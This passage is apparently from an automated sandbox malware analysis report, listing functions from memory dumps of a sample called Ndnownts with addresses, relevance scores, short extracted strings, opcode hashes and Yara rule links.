                                                                      • Instruction ID: 2c882011bbdbd12f57ebad94b1de392a22cb2ee81485b22a02de3a366976bd4a
                                                                      • Opcode Fuzzy Hash: d97f3aafa34803873c1489f30696155749879062301677317f4e9c8c31120c04
                                                                      • Instruction Fuzzy Hash: 24D1BF74E00218CFDB54DFA9D994A9DBBB2FF89300F1080A9D519AB365DB30A986CF51
                                                                      Function 00B6F498 Relevance: 6.6, Strings: 5, Instructions: 357COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (bq$(bq$(bq$(bq$(bq
                                                                      • API String ID: 0-2298650571
                                                                      • Opcode ID: a9d977e555420f0e35bec56e0d8683530253b91db3d71a1e3b271eb13e50ba31
                                                                      • Instruction ID: 5c191975b8b0bc8c8312ef8c120c040c9e10026f8f29f1efd099864d12969172
                                                                      • Opcode Fuzzy Hash: a9d977e555420f0e35bec56e0d8683530253b91db3d71a1e3b271eb13e50ba31
                                                                      • Instruction Fuzzy Hash: 9CC1E2323042658FC7559F69E850AAE7BE6EF85711B1481BAE805CB392CF39DD02C7A1
                                                                      Function 05565F27 Relevance: 3.8, Strings: 3, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )$)$D
                                                                      • API String ID: 0-2456197953
                                                                      • Opcode ID: 056cca0757d98e943160985d4a7ea1c8d6ad404baca4f5832fef47c3668b6f78
                                                                      • Instruction ID: fb1cb6855643066653e76dc073b9450043e1af53daaa9d96bdaba9ee385dee5c
                                                                      • Opcode Fuzzy Hash: 056cca0757d98e943160985d4a7ea1c8d6ad404baca4f5832fef47c3668b6f78
                                                                      • Instruction Fuzzy Hash: A111F370900299CFDB24CF14D988BE9B7B2BB45301F4058EAC50ABB390CB755E85CF05
                                                                      Function 05564FC0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %$C
                                                                      • API String ID: 0-3757747349
                                                                      • Opcode ID: 587b8442a2475ea81c84ed6ab02ba65e0664dfd0ba9253aec138c36ca031ede1
                                                                      • Instruction ID: 628e4a5360db66d362fc2e99b2448412073b8f7c3af1bc2e9905968db282fc53
                                                                      • Opcode Fuzzy Hash: 587b8442a2475ea81c84ed6ab02ba65e0664dfd0ba9253aec138c36ca031ede1
                                                                      • Instruction Fuzzy Hash: AD11B074900298DFDB64CF58D885BD8B7B2BB49300F1085DAD609B7390CBB65E858F54
                                                                      Function 055650DD Relevance: 2.5, Strings: 2, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,$.
                                                                      • API String ID: 0-3811085055
                                                                      • Opcode ID: a6dcf959ac645e87bec9b3f3c3f1da3a5d9b1d2023efb601bcc04d426c6d3b0c
                                                                      • Instruction ID: 945d123aba955b4546973a699099abd8b1b53e52635d4c4c4e8d63e6e320aa82
                                                                      • Opcode Fuzzy Hash: a6dcf959ac645e87bec9b3f3c3f1da3a5d9b1d2023efb601bcc04d426c6d3b0c
                                                                      • Instruction Fuzzy Hash: E7F0AE74904298CFDB50CF54C888BD9F7BABB09304F4484DA8809A3391D7719A8ACF40
                                                                      Function 00B60B99 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: d80948037ab6a8892cce02a1711806b15e440124aba0058307810249508681ad
                                                                      • Instruction ID: c7fbadbefd2b81630dc11c726396c9ae54799572d5c744c9225c14d7f4887648
                                                                      • Opcode Fuzzy Hash: d80948037ab6a8892cce02a1711806b15e440124aba0058307810249508681ad
                                                                      • Instruction Fuzzy Hash: EC41D430A182459FC705EF6AC4A46AE7BF1EF55314F2984DAD401EB3A2DF385C01DB52
                                                                      Function 00B60860 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: df84404ea1bc76c3508b3dd2ad84366dd35f7e366eb2bdac594984b743dc055b
                                                                      • Instruction ID: 197524f63fc8e857cac78b7b13330c24e1573f602e7aec2c8921df3992a2d175
                                                                      • Opcode Fuzzy Hash: df84404ea1bc76c3508b3dd2ad84366dd35f7e366eb2bdac594984b743dc055b
                                                                      • Instruction Fuzzy Hash: D0216D30D28109CBE748FB6AC4956AF76F1BB48700F208496D543BB2D5DB784945ABE2
                                                                      Function 00B60870 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 2f39664536a9c3238379ee243921a1c26a4059cf94c3f27af1940de230541b0e
                                                                      • Instruction ID: 7bc2a76a1492ca2a3c04ecf00285481e504a09eb524c15d8e7a6618672fdaeff
                                                                      • Opcode Fuzzy Hash: 2f39664536a9c3238379ee243921a1c26a4059cf94c3f27af1940de230541b0e
                                                                      • Instruction Fuzzy Hash: 61216030A28109DBE718FB6AC4956BF76F2AB48700F2084A5D5037B2D1DB785945ABE2
                                                                      Function 00B60953 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 50fffa8605b97794d24b24d6883282d2a5ca3312c2b3d58ea3d34c8d80399fe3
                                                                      • Instruction ID: 5847c5157b681a57ad47507a36cbc95260393d418d4b0961195d29db74e06a5f
                                                                      • Opcode Fuzzy Hash: 50fffa8605b97794d24b24d6883282d2a5ca3312c2b3d58ea3d34c8d80399fe3
                                                                      • Instruction Fuzzy Hash: 0B114F30A68109CBE718FB6AC4946BF76F1BB48700F204495D103BB2D1DB7C4D41ABE2
                                                                      Function 00B60BDD Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: 2ef43ca18695d745b83d6fbce366e2add034f4ed093d9d470ec70536ad1bab32
                                                                      • Instruction ID: ac58c9e8f1820cdec0b9482377861aaed234827d04a440b45533597f4a694126
                                                                      • Opcode Fuzzy Hash: 2ef43ca18695d745b83d6fbce366e2add034f4ed093d9d470ec70536ad1bab32
                                                                      • Instruction Fuzzy Hash: A8210B34B501159FDB54EF6AC495BAEBBF2EF88700F258059E805AB3A5CB749D01CB81
                                                                      Function 0556597F Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %
                                                                      • API String ID: 0-2567322570
                                                                      • Opcode ID: 96a9dd7982b0de8945327f304e6643ebdcd10c98c369f7cdb0e6b5b01b907b02
                                                                      • Instruction ID: f0ec70ed8ff451ba13349aa22e59a3f2c6efb19b679203b69d98a9fff6383a41
                                                                      • Opcode Fuzzy Hash: 96a9dd7982b0de8945327f304e6643ebdcd10c98c369f7cdb0e6b5b01b907b02
                                                                      • Instruction Fuzzy Hash: 44217D749442AACFDBA0CF58C884FE8BBB1BB09308F5085E9D419A7251CB755EC6DF50
                                                                      Function 055651BA Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2
                                                                      • API String ID: 0-450215437
                                                                      • Opcode ID: 6825f02d5f60807d42e4835fb5bddf66b9f6a892d7efc24cb9891491b53d7925
                                                                      • Instruction ID: 20970e4742c2c0a2d4b9949c7fe258562e975af2282579be228ac9c24fd9be1c
                                                                      • Opcode Fuzzy Hash: 6825f02d5f60807d42e4835fb5bddf66b9f6a892d7efc24cb9891491b53d7925
                                                                      • Instruction Fuzzy Hash: 9621B0B4A04268CFDB64DF64C890BEABBB2FB49300F1084D9D50DA7254DB325E86DF90
                                                                      Function 0556590B Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D
                                                                      • API String ID: 0-2746444292
                                                                      • Opcode ID: e883b841b1bb0ff5ea6d971eed4a416389c7f5a3e6bdd850f801a1b4e66ccfe1
                                                                      • Instruction ID: a39ab22755d09042c60de995928b29c49493856a36e225fb1933a77845a406d7
                                                                      • Opcode Fuzzy Hash: e883b841b1bb0ff5ea6d971eed4a416389c7f5a3e6bdd850f801a1b4e66ccfe1
                                                                      • Instruction Fuzzy Hash: C8F0E2B4900299CBCB24DF14D984BDDB7B2BB45300F4048EAC50AB7290CB755E86CF05
                                                                      Function 06C80238 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Y
                                                                      • API String ID: 0-3233089245
                                                                      • Opcode ID: 58fe048777ffdf87e5711f11480b64dae82684055e4284eb072b29bc18a3acbd
                                                                      • Instruction ID: 0f0d0a60530757e6b16285805f66822c69369f96050e07438be74d2070d75132
                                                                      • Opcode Fuzzy Hash: 58fe048777ffdf87e5711f11480b64dae82684055e4284eb072b29bc18a3acbd
                                                                      • Instruction Fuzzy Hash: 20F01770A0011A8FDBA8DF58C894B8AB3B5FB48301F0080D5D649E7354CA349EC9CF91
                                                                      Function 06C841AF Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: p
                                                                      • API String ID: 0-2181537457
                                                                      • Opcode ID: 710c7ccaf7dbdf027b68042985fab8c1af5a049fee0c906650bb835d9a815e6f
                                                                      • Instruction ID: c96c191bcd249d110d348fc3202e819ea58e215ecbb11d3e5ef515ae8e51b6b7
                                                                      • Opcode Fuzzy Hash: 710c7ccaf7dbdf027b68042985fab8c1af5a049fee0c906650bb835d9a815e6f
                                                                      • Instruction Fuzzy Hash: C2F01730A001199FC758EF18CC64A9AB7B5FB8C300F0040E5E609E7354CB309E89CF55
                                                                      Function 05565CE2 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .
                                                                      • API String ID: 0-248832578
                                                                      • Opcode ID: 84d1f85a1ff4211dec3911d044977aabbd1d5c7797f3d8f2f942eceb26fc3c29
                                                                      • Instruction ID: c79e819388e0acabccce2301b4ed26d4357b0b05519abd1c42af48e8a48691e9
                                                                      • Opcode Fuzzy Hash: 84d1f85a1ff4211dec3911d044977aabbd1d5c7797f3d8f2f942eceb26fc3c29
                                                                      • Instruction Fuzzy Hash: 87F06C74900258CFCB94DF54C995AD9B7BABB89304F5084AA8409AB351DB31AE8ACF41
                                                                      Function 05565C54 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5
                                                                      • API String ID: 0-2226203566
                                                                      • Opcode ID: b2e1b83e092feb6342f85888bb8f7d0ecdff3c9a29711b3bad1440598200a905
                                                                      • Instruction ID: 0761aac774356b78ffcbd0dbd09764f297b8111a2f17f1f41d1745766633af24
                                                                      • Opcode Fuzzy Hash: b2e1b83e092feb6342f85888bb8f7d0ecdff3c9a29711b3bad1440598200a905
                                                                      • Instruction Fuzzy Hash: 84F01531900A0ADBCF11DF64CC10ACAB776FF58300F008689EA8937260CB31AA96CF81
                                                                      Function 05565758 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D
                                                                      • API String ID: 0-2746444292
                                                                      • Opcode ID: 6578f21c2ec3464a2c1582ce1251aff508c39caff034386ed2207fecf882bca3
                                                                      • Instruction ID: 35fd8c458a2a5e386f8c4d193e0d28d05bf5032bafaaee6004c79cc0ba6e9d0d
                                                                      • Opcode Fuzzy Hash: 6578f21c2ec3464a2c1582ce1251aff508c39caff034386ed2207fecf882bca3
                                                                      • Instruction Fuzzy Hash: 9AF0AEB4904299CBDB20CF14D984F9AB7B2BB06300F4099EAD50AA7250C7B65D86DF04
                                                                      Function 05565E4B Relevance: 1.3, Strings: 1, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4
                                                                      • API String ID: 0-4088798008
                                                                      • Opcode ID: bc1316a64b76c487534285908d708a53778b1d85b7e240fcae09809d3c224781
                                                                      • Instruction ID: 6f80bd01262c1b0d968a88e8a9f6e5fe75fe69961b70b9acee0a38f8fda4600c
                                                                      • Opcode Fuzzy Hash: bc1316a64b76c487534285908d708a53778b1d85b7e240fcae09809d3c224781
                                                                      • Instruction Fuzzy Hash: 17E099798042A8CECB11CF20C948B9CBBB2BB08381F0485D5C40AA3290D3B45B86CF40
                                                                      Function 00B6F968 Relevance: .2, Instructions: 208COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b65aa09bc846a3bc3783bfd2533aa34aa34352fa4cacad4a167cc57eafeb36de
                                                                      • Instruction ID: dfa757eea69af36436772de9d238e30b90a2ff174f28d87b30da84d6f5408217
                                                                      • Opcode Fuzzy Hash: b65aa09bc846a3bc3783bfd2533aa34aa34352fa4cacad4a167cc57eafeb36de
                                                                      • Instruction Fuzzy Hash: 3F811935A00219CFCB14DFA8D5949AEBBF5FF88310B1981A9E815DB361DB74ED42CB90
                                                                      Function 05561C58 Relevance: .2, Instructions: 206COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ca41c0065043b5a2f2ff1301327ed4ebaa0e96ebcaa7cc6f2ba81d979cf3929
                                                                      • Instruction ID: 10392532ffff754dc9f14ad322f261e903193582e983cc83b328d0c1d9ebfb63
                                                                      • Opcode Fuzzy Hash: 3ca41c0065043b5a2f2ff1301327ed4ebaa0e96ebcaa7cc6f2ba81d979cf3929
                                                                      • Instruction Fuzzy Hash: 5391F270E05A48CFDB54DFA9D984BEDBBF2BF88300F10946AD109A7265DB74598ACF40
                                                                      Function 05561C68 Relevance: .2, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c643b8a9cc3c309a1f65e5fdb90ae0afc237ce7489765a0bcbd37b480501dc7a
                                                                      • Instruction ID: b243385dae1c65052fabbc02c11838d8319fce77f66a14a86ffb1cfed31efc8e
                                                                      • Opcode Fuzzy Hash: c643b8a9cc3c309a1f65e5fdb90ae0afc237ce7489765a0bcbd37b480501dc7a
                                                                      • Instruction Fuzzy Hash: B191F170E05A88CFDB54DFA9D584BEDBBF2BF88300F109069D509A7265DB74598ACF40
                                                                      Function 05561F31 Relevance: .2, Instructions: 195COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 442bf4965e307c6b8a7b22d31cc8e6938984a26e2bc556ad1de3e24226534671
                                                                      • Instruction ID: 30da103a23e902dc4b283eb77a1c8c184d929e98262a784427fac86ea27589ac
                                                                      • Opcode Fuzzy Hash: 442bf4965e307c6b8a7b22d31cc8e6938984a26e2bc556ad1de3e24226534671
                                                                      • Instruction Fuzzy Hash: 1081F270E05A88CFDB54DFA9C484BADBBF2FF88300F149469D509AB265E774598ACF40
                                                                      Function 05561D4E Relevance: .2, Instructions: 176COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b08c61b9a4d244818f04e699bc011e5935a150ccba328fc13442459c377dfb2c
                                                                      • Instruction ID: 0d13b95140e3621ce6f7fcb3282d578744d7bd65b06c9a3efc926be339a69393
                                                                      • Opcode Fuzzy Hash: b08c61b9a4d244818f04e699bc011e5935a150ccba328fc13442459c377dfb2c
                                                                      • Instruction Fuzzy Hash: CE81E170E00A48CFDB54DFA9D584BADBBF2BF48300F249069D509AB365D774598ACF40
                                                                      Function 05563AE0 Relevance: .2, Instructions: 159COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 39bba95eed0c2d0789a2e5102de5e0bd0184fe1b923b08835ed3657b98a14006
                                                                      • Instruction ID: ebc11e5903ce08e5863e9dfc5d9bb353e3045bd976deca8bd8b391e13936e527
                                                                      • Opcode Fuzzy Hash: 39bba95eed0c2d0789a2e5102de5e0bd0184fe1b923b08835ed3657b98a14006
                                                                      • Instruction Fuzzy Hash: B0616670E05248CFDB90DF68D840BADBBB2BF89300F1095AAD109A72A5DB345A89CF41
                                                                      Function 05563AF0 Relevance: .2, Instructions: 151COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1fda70fa1bda58595141b7983c71733af0683a014dd3dc068001aa8246cfc1e4
                                                                      • Instruction ID: 2cec1d937bc01c52d1ade56494bb6d421d50888b11e64dfc2fe5fa91fd670b88
                                                                      • Opcode Fuzzy Hash: 1fda70fa1bda58595141b7983c71733af0683a014dd3dc068001aa8246cfc1e4
                                                                      • Instruction Fuzzy Hash: 40614530E05258CFDB94DF69D840BAEB7B2FF89300F1094A9D109A72A5DB345E45CF81
                                                                      Function 05563EA3 Relevance: .1, Instructions: 143COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c34dcc727d275bf8bdb3ab1aff42009e27f08f74bdb4ae6dd29155b203a74852
                                                                      • Instruction ID: fdb92e913867e4963c5f27db113aa5960f76c052a63b30bd788e01a0652af889
                                                                      • Opcode Fuzzy Hash: c34dcc727d275bf8bdb3ab1aff42009e27f08f74bdb4ae6dd29155b203a74852
                                                                      • Instruction Fuzzy Hash: B4512630E05258CFDB94DFA8D840BAEB7B2FF49300F1094A9D109AB269DB349E85CF55
                                                                      Function 05563E17 Relevance: .1, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6444efb3a10fe028e4f16921c35b7442e535046c3ee6897a9950e379899beb83
                                                                      • Instruction ID: 35de7bf15ff99eb03a1aa9735aee24da8dbf05239c18416ae1a405945c8356a1
                                                                      • Opcode Fuzzy Hash: 6444efb3a10fe028e4f16921c35b7442e535046c3ee6897a9950e379899beb83
                                                                      • Instruction Fuzzy Hash: 1E515630A05248CFDB90DF68D844BAEB7B2FF49300F1055A9D149AB2AADB345E85CF55
                                                                      Function 055630F0 Relevance: .1, Instructions: 108COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ff49832394a2925418316be53cc1ffcbb7ea1c2c72d1a89fdc47e0e91c55850
                                                                      • Instruction ID: 1fbd04f70ce78409a2f416a4f9537364f791e941cd61570bf6991eb1fe6f989c
                                                                      • Opcode Fuzzy Hash: 7ff49832394a2925418316be53cc1ffcbb7ea1c2c72d1a89fdc47e0e91c55850
                                                                      • Instruction Fuzzy Hash: 3C51CA74E04158CFCBA4EF68D894B9DB7B6FB48300F1085A9D64AA7355CB346E89CF41
                                                                      Function 00B69598 Relevance: .1, Instructions: 106COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d320f21532b1012be661cac9c64934efb41714af5e20ec8d5cfea10ead0888c9
                                                                      • Instruction ID: b350c3285afd605572398d1c6a81c85119d28be7684fac3240dc3f0d0b0d19d2
                                                                      • Opcode Fuzzy Hash: d320f21532b1012be661cac9c64934efb41714af5e20ec8d5cfea10ead0888c9
                                                                      • Instruction Fuzzy Hash: F8418F70D05248DFDB05CFA9C84459DBFF5FF4A310F1884AAD409AB226D739AA45CF51
                                                                      Function 055638F0 Relevance: .1, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1753625126.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5560000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3123bb00ec11c51aa300f48d4c8aaa97092415fde30219a76a16f07796587a08
                                                                      • Instruction ID: 11abdc9d088526b15f319aae42aeec4512ef25f8b818540cf20212a929e5ec78
                                                                      • Opcode Fuzzy Hash: 3123bb00ec11c51aa300f48d4c8aaa97092415fde30219a76a16f07796587a08
